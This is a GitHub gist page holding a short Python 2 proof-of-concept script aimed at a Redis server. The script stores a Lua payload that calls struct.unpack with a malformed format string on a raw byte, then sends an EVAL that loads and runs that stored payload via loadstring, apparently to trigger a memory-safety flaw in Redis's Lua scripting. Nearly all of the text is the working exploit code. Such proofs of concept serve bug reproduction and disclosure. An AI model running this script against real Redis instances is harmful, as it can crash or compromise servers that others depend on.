-
-
Save antirez/bca0ad7a9c60c72e9600c7f720e9d035 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import hashlib | |
#3rd party | |
import redis #pip install | |
server = '127.0.0.1' | |
port = 6379 | |
def send_to_redis(server, port, data, timeout=2): | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.settimeout(timeout) | |
s.connect((server, port)) | |
try: | |
s.send(data) | |
except socket.timeout: | |
print 'Unable to connect to target ; returning' | |
return None | |
s.close() | |
def main(): | |
payload = 'return struct.unpack(\'bc0\', \'\xff\')' | |
h = hashlib.sha1() | |
h.update(payload) | |
key = h.hexdigest() | |
#submit this payload to the server (it's binary, so tough to pass in on cli) | |
r = redis.StrictRedis(host=server, port=port) | |
r.set(key, payload) | |
#reflect the payload back to redis and load it up as code | |
payload = 'eval "return loadstring(redis.call(\'get\', KEYS[1]))()" 1 %s\n' % key | |
send_to_redis(server, port, payload) | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment